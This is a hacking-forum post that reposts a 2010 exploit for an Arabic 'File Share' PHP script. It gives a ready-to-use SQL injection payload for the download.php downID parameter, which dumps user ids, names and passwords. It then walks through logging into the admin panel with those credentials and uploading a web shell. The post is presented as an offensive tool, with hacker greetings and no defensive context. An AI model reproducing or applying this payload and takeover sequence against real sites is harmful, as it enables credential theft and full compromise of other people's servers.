Jump to content
begood

Script Upload Up Your Shell (Sql Inject)

By begood, in Programe hacking

Recommended Posts

begood Newbie

begood

Posted
Posted

# Title: Script Upload Up Your Shell (Sql Inject)

# EDB-ID: 12763

# CVE-ID: ()

# OSVDB-ID: ()

# Author: MouDy-Dz

# Published: 2010-05-27

# Verified: no

# Download Exploit Code

# Download N/A

view source



[URL="http://www.exploit-db.com/exploits/12763#printSource"][/URL]

#  ----------------------oOO---(_)---OOo-----------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# |MouDy-Dz /____/ 2o1o |
#  ------------------------------------------------------------
Upload Shell
#  ------------------------------------------------------------
--------------------------------------------------------------
File Share <== all version (download.php?downID=)
arabic Script
--------------------------------------------------------------
#[+] Author : MouDy-Dz #
# [+] Email : [email]MouDy-Dz@HoTMaiL.coM[/email] #
# [+] 27-5-2010 #
# [+] Cobra Team #
# [+] Script : Upload »File share#
# All Version #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=

Exploit : scriptFile share\download.php?downID=

[url]http://localhost/scriptFile[/url]  share\download.php?downID=[Sql Inject]

[url]http://127.0.0.1/scriptFile[/url]  share\download.php?downID=[Sql Inject]


[Sql Inject] =  -4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre

Exemple = [url]http://localhost/scriptFile[/url]  share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre

you can use another Number in (-4) *_^

After
[url]http://localhost/scriptFile[/url]  share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre

You show The Admin and The password

Login =====> admincp/login.php

exemple = [url]http://localhost/scriptFile[/url]  share\admincp/login.php

after login add .php

and go to home of script and upload your shell

web site Favorites my Of Exploit  : JusT=====>  [url=http://www.exploit-db.com]Offensive Security Training presents - The Exploit Database[/url]

================== Greetz : all my friend  ===================
* Sn!per-dz * *  ???&????  * KONDAMNE * AntiSystem * Antitracker |
? ???  ????  ?????  ????  ?????
================== Greetz : My Best Forum  ===================
* [url]www.3asfh.com[/url] / [url=http://www.Dev-point.com]äÞØÉ ÇáÊØæíÑ - ÇÎÊÑÇÞ æÍãÇíÉ ÇáÔÇÊ[/url]  /www.h4ckforu.com /www.sa3eka.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...